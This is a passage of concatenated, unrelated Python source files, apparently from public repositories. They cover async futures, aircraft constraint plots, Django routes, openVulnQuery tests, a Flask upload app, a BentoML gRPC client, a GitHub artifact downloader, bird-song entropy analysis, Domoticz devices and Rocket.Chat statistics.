whenever the wrapper is called, a DeferredFuture is returned. """ def wrapper(*args, **kwargs): return cls(coro_func, args, kwargs) return wrapper def __init__(self, coro_func, args, kwargs): self._coro_func = coro_func self._args = args self._kwargs = kwargs self._state = State.PENDING self._result = None self._exception = None async def __aenter__(self): return self async def __aexit__(self, *_): self.cancel() def running(self): return self._state is State.RUNNING def cancelled(self): return self._state is State.CANCELLED def done(self): return self._state in (State.CANCELLED, State.FINISHED) def cancel(self): if self._state is State.PENDING: self._state = State.CANCELLED return True elif self._state is State.RUNNING: return False elif self._state is State.CANCELLED: return True else: ASSERT.is_(self._state, State.FINISHED) return False async def result(self): if not self.done(): await self._evaluate() if self._exception is not None: raise self._exception else: return self._result async def exception(self): if not self.done(): await self._evaluate() return self._exception async def _evaluate(self): ASSERT.is_(self._state, State.PENDING) self._state = State.RUNNING try: self._result = await self._coro_func(*self._args, **self._kwargs) except Exception as e: self._exception = e finally: self._state = State.FINISHED <filename>py_tdlib/constructors/log_stream_empty.py from ..factory import Type class logStreamEmpty(Type): pass from animations.animation_tape import AnimationTape class AnimationSetting: def __init__(self, tape: AnimationTape, repeat_time: int) -> None: self._tape = tape self._repeat_time = repeat_time @property def tape(self) -> AnimationTape: return self._tape @property def repeat_time(self) -> int: return self._repeat_time #!/usr/bin/env python3 # -*- coding:utf-8 -*- ################################################################################## # File: c:\Projects\KENYA ONE PROJECT\CORE\engines\constraint.py # # Project: c:\Projects\KENYA ONE PROJECT\CORE\engines # # Created Date: Thursday, January 9th 2020, 8:56:55 pm # # Author: <NAME> ( <<EMAIL>> ) # # ----- # # Last Modified: Thursday January 9th 2020 8:56:55 pm # # Modified By: <NAME> ( <<EMAIL>> ) # # ----- # # MIT License # # # # Copyright (c) 2020 KENYA ONE PROJECT # # # # Permission is hereby granted, free of charge, to any person obtaining a copy of# # this software and associated documentation files (the "Software"), to deal in # # the Software without restriction, including without limitation the rights to # # use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies # # of the Software, and to permit persons to whom the Software is furnished to do # # so, subject to the following conditions: # # # # The above copyright notice and this permission notice shall be included in all # # copies or substantial portions of the Software. # # # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # # SOFTWARE. # # ----- # # Copyright (c) 2020 KENYA ONE PROJECT # ################################################################################## import sys sys.path.append("../") from CORE.API.db_API import write_to_db, read_from_db import numpy as np # type: ignore import matplotlib.pylab as plt # type: ignore a = np.arange(50) ws = np.arange(10, 35, 0.01) cdmin: float = 0.025 write_to_db("cdMin", cdmin) do = read_from_db("rhoSL") dalt = read_from_db("altitudeDensity") # AAAAA k = read_from_db("k") # v = read_from_db('cruiseSpeed') * 1.688 v: float = 140 * 1.688 # AAAAA qcruise = 0.5 * dalt * v ** 2 # dynamic pressure at cruise qtakeoff = 0.5 * do * v ** 2 # dynamic pressure at take-off turnangle = 40 # turn angle loadfactor = 1 / (np.cos(turnangle)) # loadfactor twturn = ( qcruise * ((cdmin / ws) + (k * (loadfactor / qcruise) ** 2) * ws) * (v * 5850 / (0.8 * 550 * 0.6604)) ) # rate of climb roc = read_from_db("rateOfClimb") * 3.28 * 60 # rate of climb ft/min #AAAAAAA # Vy=sqrt((2/do)*ws * sqrt( k/(3*cdmin) )) Vy = 150 Vv = roc / 60 qclimb = 0.5 * do * (Vy ** 2) twclimb = ( (Vv / Vy) + ((qclimb / ws) * cdmin) + ((qclimb / ws) * cdmin) + ((k / qclimb) * ws) ) * (Vy * 5850 / (0.6 * 550)) # ground run Sg: int = 1000 # ground run ft Vlof: float = 70 * 1.688 clto: float = 1.4670 u: float = 0.04 cdto = 0.03 q1 = 0.5 * do * (Vlof / np.sqrt(2)) ** 2 twtakeoff = ( ((Vlof ** 2) / (2 * 32.174 * Sg)) + ((q1 * cdto) / ws) + u * (1 - (q1 * clto / ws)) ) * (Vlof * 5850 / (0.6 * 550)) # cruise altitude twcruise = (((qcruise * cdmin) / ws) + ((k / qcruise) * ws)) * ( v * 5850 / (0.6 * 550 * 0.6604) ) # service ceiling twservceiling = ( (1.668 / np.sqrt((2 * ws / dalt) * np.sqrt(k / (3 * cdmin)))) + (4 * np.sqrt(k * cdmin / 3)) ) * ((v * 5850) / (0.7 * 550 * 0.6604)) plt.plot(ws, twclimb, label="climb") plt.plot(ws, twturn, label="turn") plt.plot(ws, twtakeoff, label="Takeoff") plt.plot(ws, twservceiling, label="Service Ceiling") plt.plot(ws, twcruise, label="cruise") plotWS = read_from_db("WS") plt.axvline(x=plotWS) ################################ plt.legend(loc="upper left") if __name__ == "__main__": plt.show() def find_nearest(array, value): idx = (np.abs(array - value)).argmin() return idx # print(find_nearest(ws, plotWS)) myidx = find_nearest(ws, plotWS) # cruiseidx = (twcruise[myidx]) # takeoffidx = twtakeoff[myidx] # climbidx = twclimb[myidx] # turnidx = twturn[myidx] # ceilingidx = twservceiling[myidx] # print([cruiseidx,takeoffidx,climbidx,turnidx,ceilingidx]) def point(): cruiseidx = twcruise[myidx] takeoffidx = twtakeoff[myidx] climbidx = twclimb[myidx] turnidx = twturn[myidx] ceilingidx = twservceiling[myidx] # print([cruiseidx,takeoffidx,climbidx,turnidx,ceilingidx]) # print (cruiseidx,"cruiseidx") x = np.array([cruiseidx, takeoffidx, climbidx, turnidx, ceilingidx]) idx = x.argmax() return x[idx] finalBHP = point() # print ( finalBHP,"BHP") write_to_db("finalBHP", finalBHP) S = (read_from_db("finalMTOW")) / (plotWS * 10.57) write_to_db("S", S) <gh_stars>0 from django.urls import path from .views import BookDetailView, BookListView app_name = 'books' urlpatterns = [ path('', BookListView.as_view(), name='list'), path('<int:pk>/', BookDetailView.as_view(), name='detail') ]import unittest from openVulnQuery import constants IPS_SIGNATURE_LABEL = 'ips_signatures' API_LABELS = ( 'advisory_id', 'advisory_title', 'bug_ids', 'cves', 'cvrf_url', 'cvss_base_score', 'cwe', 'first_fixed', 'first_published', 'ios_release', IPS_SIGNATURE_LABEL, 'last_updated', 'oval_url', 'product_names', 'publication_url', 'sir', 'summary', ) IPS_SIGNATURES = ( 'legacy_ips_id', 'legacy_ips_url', 'release_version', 'software_version', ) ALLOWS_FILTER = ( 'all', 'severity', ) NA_INDICATOR = 'NA' JSON_OUTPUT_FORMAT_TOKEN = 'json' CSV_OUTPUT_FORMAT_TOKEN = 'csv' CVRF_ADVISORY_FORMAT_TOKEN = '<PASSWORD>' OVAL_ADVISORY_FORMAT_TOKEN = '<PASSWORD>' IOS_ADVISORY_FORMAT_TOKEN = 'ios' ADVISORY_FORMAT_TOKENS = ( CVRF_ADVISORY_FORMAT_TOKEN, OVAL_ADVISORY_FORMAT_TOKEN, IOS_ADVISORY_FORMAT_TOKEN, ) class ConstantsTest(unittest.TestCase): def test_constants_unchanged_na_indicator(self): self.assertEqual(constants.NA_INDICATOR, NA_INDICATOR) def test_constants_filters_available(self): self.assertEqual(constants.ALLOWS_FILTER, ALLOWS_FILTER) def test_constants_unchanged_advisory_tokens(self): self.assertEqual( constants.ADVISORY_FORMAT_TOKENS, ADVISORY_FORMAT_TOKENS) def test_constants_unchanged_json_format_token(self): self.assertEqual( constants.JSON_OUTPUT_FORMAT_TOKEN, JSON_OUTPUT_FORMAT_TOKEN) def test_constants_unchanged_csv_format_token(self): self.assertEqual( constants.CSV_OUTPUT_FORMAT_TOKEN, CSV_OUTPUT_FORMAT_TOKEN) def test_constants_unchanged_cvrf_advisory_format_token(self): self.assertEqual( constants.CVRF_ADVISORY_FORMAT_TOKEN, CVRF_ADVISORY_FORMAT_TOKEN) def test_constants_unchanged_oval_advisory_format_token(self): self.assertEqual( constants.OVAL_ADVISORY_FORMAT_TOKEN, OVAL_ADVISORY_FORMAT_TOKEN) def test_constants_unchanged_ios_advisory_format_token(self): self.assertEqual( constants.IOS_ADVISORY_FORMAT_TOKEN, IOS_ADVISORY_FORMAT_TOKEN) def test_constants_unchanged_ips_signature_label(self): self.assertEqual(constants.IPS_SIGNATURE_LABEL, IPS_SIGNATURE_LABEL) def test_constants_api_labels_is_non_empty_tuple(self): self.assertTrue(isinstance(constants.API_LABELS, tuple)) self.assertTrue(constants.API_LABELS) def test_constants_unique_api_labels(self): api_labels = sorted(constants.API_LABELS) api_labels_unique = sorted(set(api_labels)) self.assertEqual(api_labels, api_labels_unique) import re from flask import Flask, render_template, request from keras.preprocessing.image import load_img from keras.preprocessing.image import img_to_array from keras.applications.vgg16 import preprocess_input from keras.applications.vgg16 import decode_predictions from keras.applications.vgg16 import VGG16 app = Flask(__name__) @app.route('/',methods=['GET']) # def hello_world(): # return render_template('index.html') @app.route('/', methods=['POST']) def predict(): if request.method == 'POST': image_file = request.files.get('imagefile') image_path = "./images/" + image_file.filename image_file.save(image_path) return render_template('index.html') else: return render_template('index.html') if __name__ == "__main__": app.run(port=3000, debug=True)# import logging # from typing import TYPE_CHECKING, Optional # # from ..utils import cached_property # from .bento_repository_api import BentoRepositoryAPIClient # # if TYPE_CHECKING: # from .proto.yatai_service_pb2_grpc import YataiStub # # logger = logging.getLogger(__name__) from typing import TYPE_CHECKING, Optional if TYPE_CHECKING: from bentoml._internal.yatai_client.proto.yatai_service_pb2_grpc import YataiStub import logging from simple_di import inject from bentoml._internal.utils import cached_property from bentoml._internal.yatai_client.bento_repository_api import BentoRepositoryAPIClient from bentoml._internal.yatai_client.deployment_api import DeploymentAPIClient from bentoml._internal.yatai_client.utils import parse_grpc_url logger = logging.getLogger(__name__) class YataiClient: """ Python Client for interacting with YataiService """ def __init__(self, yatai_server_name: str): self._yatai_service = get_yatai_service() self.bundle_api_client = None self.deploy_api_client = None @cached_property def bundles(self) -> BentoRepositoryAPIClient: return BentoRepositoryAPIClient(self._yatai_service) @cached_property def deployment(self) -> DeploymentAPIClient: return DeploymentAPIClient(self._yatai_service) # def __init__(self, yatai_service: Optional["YataiStub"] = None): # self.yatai_service = yatai_service if yatai_service else get_yatai_service() # self.bento_repository_api_client = None # self.deployment_api_client = None # # @cached_property # def repository(self) -> "BentoRepositoryAPIClient": # return BentoRepositoryAPIClient(self.yatai_service) def get_yatai_client(yatai_url: Optional[str] = None) -> YataiClient: """ Args: yatai_url (`str`): Yatai Service URL address. Returns: :obj:`~YataiClient`, a python client to interact with :obj:`Yatai` gRPC server. Example:: from bentoml.yatai.client import get_yatai_client custom_url = 'https://remote.yatai:50050' yatai_client = get_yatai_client(custom_url) """ # yatai_service = get_yatai_service(channel_address=yatai_url) # return YataiClient(yatai_service=yatai_service) @inject def get_yatai_service( channel_address: str, access_token: str, access_token_header: str, tls_root_ca_cert: str, tls_client_key: str, tls_client_cert: str, ) -> "YataiStub": import certifi import grpc from bentoml._internal.yatai_client.interceptor import header_client_interceptor from bentoml._internal.yatai_client.proto.yatai_service_pb2_grpc import YataiStub channel_address = channel_address.strip() schema, addr = parse_grpc_url(channel_address) header_adder_interceptor = header_client_interceptor.header_adder_interceptor( access_token_header, access_token ) if schema in ("grpc", "https"): tls_root_ca_cert = tls_root_ca_cert or certifi.where() with open(tls_client_cert, "rb") as fb: ca_cert = fb.read() if tls_client_key: with open(tls_client_key, "rb") as fb: tls_client_key = fb.read() if tls_client_cert: with open(tls_client_cert, "rb") as fb: tls_client_cert = fb.read() credentials = grpc.ssl_channel_credentials( root_certificates=ca_cert, private_key=tls_client_key, certificate_chain=tls_client_cert, ) channel = grpc.secure_channel(addr, credentials) else: channel = grpc.insecure_channel(addr) return YataiStub(grpc.intercept_channel(channel, header_adder_interceptor)) #!/usr/bin/env python3 import sys import os import json import fnmatch import hashlib import tempfile import time import shutil import requests import jsonschema import pathlib from datetime import datetime, timedelta from io import BytesIO from zipfile import ZipFile from urllib.request import urlopen # Only add artifacts that validate from spliced.schemas import spliced_result_schema here = os.environ.get("GITHUB_WORKSPACE") or os.getcwd() ################################################################################ # Helper Functions ################################################################################ def get_envar(name): """ Given a name, return the corresponding environment variable. Exit if not defined, as using this function indicates the envar is required. Parameters: name (str): the name of the environment variable """ value = os.environ.get(name) if not value: sys.exit("%s is required." % name) return value def abort_if_fail(response, reason): """If PASS_ON_ERROR, don't exit. Otherwise exit with an error and print the reason. Parameters: response (requests.Response) : an unparsed response from requests reason (str) : a message to print to the user for fail. """ message = "%s: %s: %s\n %s" % ( reason, response.status_code, response.reason, response.json(), ) if os.environ.get("PASS_ON_ERROR"): print("Error, but PASS_ON_ERROR is set, continuing: %s" % message) else: sys.exit(message) def set_env(name, value): """helper function to echo a key/value pair to the environement file Parameters: name (str) : the name of the environment variable value (str) : the value to write to file """ environment_file_path = os.environ.get("GITHUB_ENV") with open(environment_file_path, "a") as environment_file: environment_file.write("%s=%s" % (name, value)) def get_file_hash(filepath, algorithm="sha256"): """return an md5 hash of the file based on a criteria level. This is intended to give the file a reasonable version. Parameters ========== image_path: full path to the singularity image """ try: hasher = getattr(hashlib, algorithm)() except AttributeError: sys.exit("%s is an invalid algorithm." % algorithm) with open(filepath, "rb") as f: for chunk in iter(lambda: f.read(4096), b""): hasher.update(chunk) return hasher.hexdigest() def get_creation_timestamp(filename): """Get creation timestamp for a file""" filen = pathlib.Path(filename) assert filen.exists() return filen.stat().st_ctime def get_size(filename): filen = pathlib.Path(filename) assert filen.exists() return filen.stat().st_size ################################################################################ # Global Variables (we can't use GITHUB_ prefix) ################################################################################ API_VERSION = "v3" BASE = "https://api.github.com" HEADERS = { "Authorization": "token %s" % get_envar("INPUT_TOKEN"), "Accept": "application/vnd.github.%s+json;application/vnd.github.antiope-preview+json;application/vnd.github.shadow-cat-preview+json" % API_VERSION, } # used to calculate if something is too old to parse today = datetime.now() # URLs repository = os.environ.get("INPUT_REPOSITORY") or os.environ.get("GITHUB_REPOSITORY") if not repository: sys.exit("GITHUB_REPOSITORY is required!") print(repository) REPO_URL = "%s/repos/%s" % (BASE, repository) ARTIFACTS_URL = "%s/actions/artifacts" % REPO_URL # If we have a run ID in the environment, scope to that RUN_ID = os.environ.get("INPUT_RUNID") if RUN_ID: ARTIFACTS_URL = "%s/actions/runs/%s/artifacts" % (REPO_URL, RUN_ID) print(ARTIFACTS_URL) def get_artifacts(repository, days=2): """ Retrieve artifacts for a repository. """ # Check if the branch already has a pull request open results = [] page = 1 while True: params = {"per_page": 100, "page": page} response = requests.get(ARTIFACTS_URL, params=params, headers=HEADERS) print("Retrieving page %s for %s" % (page, ARTIFACTS_URL)) while response.status_code == 403: print("API rate limit likely exceeded, sleeping for 10 minutes.") time.sleep(600) response = requests.get(ARTIFACTS_URL, params=params, headers=HEADERS) if response.status_code != 200: abort_if_fail(response, "Unable to retrieve artifacts") response = response.json() # We must break if found results > days old, otherwise we will continue # and use up our API key! artifacts = response["artifacts"] if any([older_than(x, days) for x in artifacts]): print("Results are older than %s days, stopping query." % days) # but still add the last set since we have them results += artifacts break results += artifacts # We are on the last page if response["total_count"] < 100: break page += 1 return results def older_than(artifact, days=2): """ Determine if an artifact is older than days, return True/False """ start_date = today - timedelta(days=days) created_at = artifact["created_at"] created_timestamp = datetime.strptime(created_at, "%Y-%m-%dT%H:%M:%SZ") diff = created_timestamp - start_date # If the difference in days is negative, it was created before the start date if diff.days < 0: return True return False def recursive_find(base, pattern="*"): for root, _, filenames in os.walk(base): for filename in fnmatch.filter(filenames, pattern): yield os.path.join(root, filename) def read_json(filename): with open(filename, "r") as fd: content = json.loads(fd.read()) return content def download_artifacts(artifacts, output, days): """ Extract artifacts to an output directory """ if not os.path.exists(output): os.makedirs(output) for artifact in artifacts: if artifact["expired"]: print( "Artifact %s from %s is expired." % (artifact["name"], artifact["created_at"]) ) continue # Is it within our number of days to check (a few might sneak through) if days: if older_than(artifact, days): print( "Artifact %s was created %s, more than %s days ago." % (artifact["name"], artifact["created_at"], days) ) continue response = requests.get(artifact["archive_download_url"], headers=HEADERS) if response.status_code != 200: abort_if_fail(response, "Unable to download artifact %s" % artifact["name"]) # Grab the created at date created_at = artifact["created_at"] # Create a temporary directory tmp = tempfile.mkdtemp() zipfile = ZipFile(BytesIO(response.content)) zipfile.extractall(tmp) # Loop through files, add those that aren't present for filename in recursive_find(tmp): try: data = read_json(filename) except: print("%s is not valid json, cannot parse." % filename) continue # We can load any valid result (does not need to have predictions) try: jsonschema.validate(data, schema=spliced_result_schema) except: print("%s is not valid for the current result schema." % filename) continue relpath = filename.replace(tmp, "").strip(os.sep) # replace version @ with - filepath = filename.replace("@", "-") # Remove package prefix filepath = filepath.replace("pkg-", "", 1) # We don't need the directory - can get metadata from the basename filepath = os.path.basename(filepath) # Add main package at top level pkg = filepath.split("-")[0] # Get the experiment also experiment = ( filepath.split("experiment")[-1].replace("splices.json", "").strip("-") ) # Just maintain the entire directory structure to read for the folder filepath = filepath.replace("-splices.json", "") # Let's split the package name and version as part of the path finalpath = os.path.join(output, experiment, pkg, filepath, "splices.json") # If the file doesn't have size, don't add size = get_size(filename) if size == 0: print("Result file %s has size 0, skipping." % relpath) continue # If it doesn't exist, add right away! if not os.path.exists(finalpath): print("Found new result file: %s" % relpath) save_artifact(filename, finalpath) # Otherwise compare by hash (and date?) else: created_at_ts = datetime.strptime( created_at, "%Y-%m-%dT%H:%M:%SZ" ).timestamp() old_created_at = os.stat(finalpath).st_ctime # If the recent is newer, copy over if created_at_ts > old_created_at: save_artifact(filename, finalpath) # Cleanup the temporary directory shutil.rmtree(tmp) def save_artifact(source, destination): """ Save an artifact. """ destdir = os.path.dirname(destination) if not os.path.exists(destdir): os.makedirs(destdir) if os.path.exists(destination): os.remove(destination) shutil.copyfile(source, destination) def main(): """main primarily parses environment variables to prepare for creation""" # Github repository to check repository = os.environ.get("INPUT_REPOSITORY") or os.environ.get( "GITHUB_REPOSITORY" ) output = os.environ.get("INPUT_OUTDIR", os.path.join(here, "artifacts")) # Number of days to go back (stick to max otherwise cannot run) days = int(os.environ.get("INPUT_DAYS", 2)) # Retrieve artifacts artifacts = get_artifacts(repository, days) # Download artifacts to output directory download_artifacts(artifacts, output, days) if __name__ == "__main__": main() <gh_stars>10-100 """ Setup engine application entry """ from nspawn.app.engine.main import SetupMain if __name__ == "__main__": SetupMain().perform() <reponame>JaerongA/lman-deafening """ Calculate entropy, entropy variance per syllable Stores the results in individual_syllable, syllable table """ def get_entropy(query, cmap='hot_r', entropy_color='k', update=False, save_fig=None, view_folder=False, update_db=False, fig_ext='.png'): from pyfinch.analysis import note_buffer, freq_range, nb_note_crit from pyfinch.analysis import AudioInfo, SongInfo from pyfinch.database.load import create_db, DBInfo, ProjectLoader from pyfinch.utils import save from pyfinch.utils.draw import remove_right_top import matplotlib.colors as colors import matplotlib.gridspec as gridspec import matplotlib.pyplot as plt import pandas as pd # Create & Load database if update_db: # Assumes that song, ff database have been created create_db('create_individual_syllable.sql') # All song syllables create_db('create_syllable.sql') # Song syllables averaged per session # Make save path if save_fig: save_path = save.make_dir(ProjectLoader().path / 'Analysis', save_folder_name, add_date=False) # Load database db = ProjectLoader().load_db() # SQL statement db.execute(query) # Loop through db for row in db.cur.fetchall(): # Load song info from db song_db = DBInfo(row) name, path = song_db.load_song_db() song_note = song_db.songNote si = SongInfo(path, name, update=update) # song object df = pd.DataFrame() # Store results here note_ind1 = -1 # note index across the session for file in si.files: file = ProjectLoader().path / file # print(f'Loading... {file}') # Loop through the notes note_ind2 = -1 # note index within a file # Load audio object with info from .not.mat files ai = AudioInfo(file) ai.load_notmat() for note, onset, offset in zip(ai.syllables, ai.onsets, ai.offsets): if note not in song_db.songNote: continue # skip if not a song note if update_db and note in song_note: # Fill in song info query = f"INSERT OR IGNORE INTO syllable (songID, birdID, taskName, note)" \ f"VALUES({song_db.id}, '{song_db.birdID}', '{song_db.taskName}', '{note}')" db.cur.execute(query) db.conn.commit() song_note = song_note.replace(note, '') # Note start and end note_ind1 += 1 # note index across the session note_ind2 += 1 # note index within a file # if note_ind1 != 44: # continue duration = offset - onset # Get spectrogram timestamp, data = ai.extract([onset, offset]) # Extract data within the range spect_time, spect, spect_freq = ai.spectrogram(timestamp, data) spectral_entropy = ai.get_spectral_entropy(spect, mode='spectral') se_dict = ai.get_spectral_entropy(spect, mode='spectro_temporal') if update_db and note in song_db.songNote: query = f"INSERT OR IGNORE INTO individual_syllable (noteIndSession, noteIndFile, songID, fileID, birdID, taskName, note, context)" \ f"VALUES({note_ind1}, {note_ind2}, {song_db.id}, '{file.stem}', '{song_db.birdID}', '{song_db.taskName}', '{note}', '{ai.context}')" db.cur.execute(query) db.conn.commit() query = f"UPDATE individual_syllable " \ f"SET entropy={round(spectral_entropy, 3)}, spectroTemporalEntropy={round(se_dict['mean'], 3)}, entropyVar={round(se_dict['var'], 4)} " \ f"WHERE noteIndSession={note_ind1} AND noteIndFile={note_ind2} AND songID={song_db.id}" db.cur.execute(query) # Organize results per song session temp_df = pd.DataFrame({'note': [note], 'context': [ai.context], 'spectral_entropy': [round(spectral_entropy, 3)], 'spectro_temporal_entropy': [round(se_dict['mean'], 3)], 'entropy_var': [round(se_dict['var'], 4)] }) df = df.append(temp_df, ignore_index=True) if save_fig: # Parameters txt_offset = 0.2 font_size = 6 # Plot figure fig = plt.figure(figsize=(4, 2), dpi=250) fig_name = f"{note_ind1 :03} - {file.name}, note#{note_ind2} - {note}" plt.suptitle(fig_name, y=.90, fontsize=font_size) gs = gridspec.GridSpec(4, 6) # Plot spectrogram ax_spect = plt.subplot(gs[1:3, 0:3]) spect_time = spect_time - spect_time[0] # starts from zero ax_spect.pcolormesh(spect_time, spect_freq, spect, # data cmap=cmap, shading='auto', norm=colors.SymLogNorm(linthresh=0.05, linscale=0.03, vmin=0.5, vmax=100, )) remove_right_top(ax_spect) ax_spect.set_xlim(-note_buffer, duration + note_buffer) ax_spect.set_ylim(freq_range[0], freq_range[1]) ax_spect.set_xlabel('Time (ms)', fontsize=font_size) ax_spect.set_ylabel('Frequency (Hz)', fontsize=font_size) plt.yticks(freq_range, list(map(str, freq_range)), fontsize=5) plt.xticks(fontsize=5), plt.yticks(fontsize=5) # Calculate spectral entropy per time bin # Plot syllable entropy ax_se = ax_spect.twinx() ax_se.plot(spect_time, se_dict['array'], entropy_color) ax_se.set_ylim(0, 1) ax_se.spines['top'].set_visible(False) ax_se.set_ylabel('Entropy', fontsize=font_size) plt.xticks(fontsize=5), plt.yticks(fontsize=5) # Print out text results txt_xloc = -1.5 txt_yloc = 0.8 ax_txt = plt.subplot(gs[1:, -1]) ax_txt.set_axis_off() # remove all axes ax_txt.text(txt_xloc, txt_yloc, f"Spectral Entropy = {round(spectral_entropy, 3)}", fontsize=font_size) txt_yloc -= txt_offset ax_txt.text(txt_xloc, txt_yloc, f"Spectrotemporal Entropy = {round(se_dict['mean'], 3)}", fontsize=font_size) txt_yloc -= txt_offset ax_txt.text(txt_xloc, txt_yloc, f"Entropy Variance = {round(se_dict['var'], 4)}", fontsize=font_size) # Save results save_path2 = save.make_dir(save_path, si.name, add_date=False) save.save_fig(fig, save_path2, fig_name, view_folder=view_folder, fig_ext=fig_ext) # Save results to ff_results db if not df.empty: if update_db: for note in df['note'].unique(): for context in df['context'].unique(): temp_df = df[(df['note'] == note) & (df['context'] == context)] if context == 'U': db.cur.execute( f"UPDATE syllable SET nbNoteUndir={len(temp_df)} WHERE songID= {song_db.id} AND note= '{note}'") if len(temp_df) >= nb_note_crit: db.cur.execute( f"UPDATE syllable SET entropyUndir={temp_df['spectral_entropy'].mean() : .3f} WHERE songID= {song_db.id} AND note= '{note}'") db.cur.execute( f"UPDATE syllable SET spectroTemporalEntropyUndir={temp_df['spectro_temporal_entropy'].mean(): .3f} WHERE songID= {song_db.id} AND note= '{note}'") db.cur.execute( f"UPDATE syllable SET entropyVarUndir={temp_df['entropy_var'].mean(): .4f} WHERE songID= {song_db.id} AND note= '{note}'") elif context == 'D': db.cur.execute( f"UPDATE syllable SET nbNoteDir={len(temp_df)} WHERE songID= {song_db.id} AND note= '{note}'") if len(temp_df) >= nb_note_crit: db.cur.execute( f"UPDATE syllable SET entropyDir={temp_df['spectral_entropy'].mean() : .3f} WHERE songID= {song_db.id} AND note= '{note}'") db.cur.execute( f"UPDATE syllable SET spectroTemporalEntropyDir={temp_df['spectro_temporal_entropy'].mean() : .3f} WHERE songID= {song_db.id} AND note= '{note}'") db.cur.execute( f"UPDATE syllable SET entropyVarDir={temp_df['entropy_var'].mean() : .4f} WHERE songID= {song_db.id} AND note= '{note}'") db.conn.commit() # If neither condition meets the number of notes criteria db.cur.execute( f"SELECT nbNoteUndir, nbNoteDir FROM syllable WHERE songID={song_db.id} AND note= '{note}'") nb_notes = [{'U': data[0], 'D': data[1]} for data in db.cur.fetchall()][0] if not (bool(nb_notes['U']) or bool(nb_notes['D'])): db.cur.execute(f"DELETE FROM syllable WHERE songID= {song_db.id} AND note= '{note}'") db.conn.commit() # Save df to csv if "save_path2" in locals(): df = df.rename_axis(index='index') df.to_csv(save_path2 / ('-'.join(save_path2.stem.split('-')[1:]) + '.csv'), index=True, header=True) if update_db: db.to_csv('syllable') db.to_csv('individual_syllable') print('Done!') if __name__ == '__main__': # Parameter update = False # update or make a new cache file for a class object save_fig = True # save the result figure view_folder = True # view the folder where figures are stored update_db = False # save results to DB save_folder_name = 'Entropy' # figures saved to analysis/save_folder_name entropy_color = 'm' cmap = 'Greys' fig_ext = '.pdf' # .png or .pdf # SQL statement query = "SELECT * FROM song WHERE id=71" get_entropy(query, cmap=cmap, entropy_color=entropy_color, update=update, save_fig=save_fig, view_folder=view_folder, update_db=update_db, fig_ext=fig_ext ) <filename>devices/device_factory.py import Domoticz import toonapilib from devices.device_container import container from devices.gas import DeviceGas from devices.heating_active import DeviceHeatingActive from devices.hotwater_active import DeviceHotWaterActive from devices.modulation_level import DeviceModulationLevel from devices.power import DevicePower from devices.preheat_active import DevicePreHeatActive from devices.program_state import DeviceProgramState from devices.set_point import DeviceSetPoint from devices.temperature import DeviceTemperature from devices.thermostat_state import DeviceThermostatState from devices.smartplug import DeviceSmartPlugState from devices.smartplug import DeviceSmartPlugUsage from devices.smartplug import DeviceSmartPlugkWh from devices.lights import DeviceLightState class DeviceFactory: def __init__(self): return @staticmethod def create_devices(toon, plugin_devices): Domoticz.Log("Check and create Toon devices") """Adding standard devices""" container.add_device(DevicePower(plugin_devices, toon).create()) container.add_device(DeviceGas(plugin_devices, toon).create()) container.add_device(DeviceTemperature(plugin_devices, toon).create()) container.add_device(DeviceSetPoint(plugin_devices, toon).create()) container.add_device(DeviceHeatingActive(plugin_devices, toon).create()) container.add_device(DeviceHotWaterActive(plugin_devices, toon).create()) container.add_device(DevicePreHeatActive(plugin_devices, toon).create()) container.add_device(DeviceThermostatState(plugin_devices, toon).create()) container.add_device(DeviceProgramState(plugin_devices, toon).create()) container.add_device(DeviceModulationLevel(plugin_devices, toon).create()) # Smart Plugs for plug in toon.smartplugs: container.add_device(DeviceSmartPlugState(plugin_devices, toon, plug).create(plug)) container.add_device(DeviceSmartPlugUsage(plugin_devices, toon, plug).create(plug)) container.add_device(DeviceSmartPlugkWh(plugin_devices, toon, plug).create(plug)) # Lights for light in toon.lights: container.add_device(DeviceLightState(plugin_devices, toon, light).create(light)) return container <reponame>Lab-8916100448256/crazy-toads.github.io # coding: utf8 # toutes les chaines sont en unicode (même les docstrings) from __future__ import unicode_literals from pprint import pprint from rocketchat_API.rocketchat import RocketChat import json import dev_config as cfg import os import random from datetime import datetime from monthdelta import monthdelta from common.channelhelper import getTsunamy from common.channelhelper import Tsunami def getColor(): r = random.randrange(255) g = random.randrange(255) b = random.randrange(255) return 'rgb({:0},{:0},{:0})'.format(r,g,b) rocket = RocketChat(cfg.rocket['user'], cfg.rocket['password'], server_url='https://coa.crapaud-fou.org') index = 0 labels = [None] * 12 messagesByChannel = [] messagesByTsunamy = [] usersByChannel = [] messagesDataTsunamy = { "global": [0] * 12, "project": [0] * 12, "democraty": [0] * 12, "ecology": [0] * 12, "technology": [0] * 12, } now = datetime.now() date = datetime(now.year, now.month, now.day, 0,0,0) info = { "updated": "updated {:02}/{:02}/{:04}".format(now.day, now.month, now.year), "labels": labels, "messagesByChannel": messagesByChannel, "usersByChannel": usersByChannel, "messagesByTsunamy": [{ "label": "global", "backgroundColor": getColor(), "data": messagesDataTsunamy['global'] }, { "label": "projet", "backgroundColor": getColor(), "data": messagesDataTsunamy['project'] }, { "label": "democratie", "backgroundColor": getColor(), "data": messagesDataTsunamy['democraty'] }, { "label": "ecologie", "backgroundColor": getColor(), "data": messagesDataTsunamy['ecology'] }, { "label": "technologie", "backgroundColor": getColor(), "data": messagesDataTsunamy['technology'] }] } while True: channels = rocket.channels_list(offset=index).json() totalChannels = channels['total'] for channel in channels['channels']: dataMess = [] dataUsers = [] pprint( channel['name'] ) begin = date - monthdelta(12) end = begin + monthdelta(1) tsunamy = getTsunamy(channel) for id in range(0, 12): labels[id] = begin.strftime("%b %Y") begindate = begin.isoformat() enddate = end.isoformat() resultMess = rocket.channels_history(channel['_id'], oldest= begindate, latest=enddate, count= 10000).json() lenght = len(resultMess['messages']) dataMess.append(lenght) if lenght > 0: if tsunamy & Tsunami.GLOBAL: messagesDataTsunamy['global'][id] += lenght if tsunamy & Tsunami.PROJECT: messagesDataTsunamy['project'][id] += lenght if tsunamy & Tsunami.DEMOCRACY: messagesDataTsunamy['democraty'][id] += 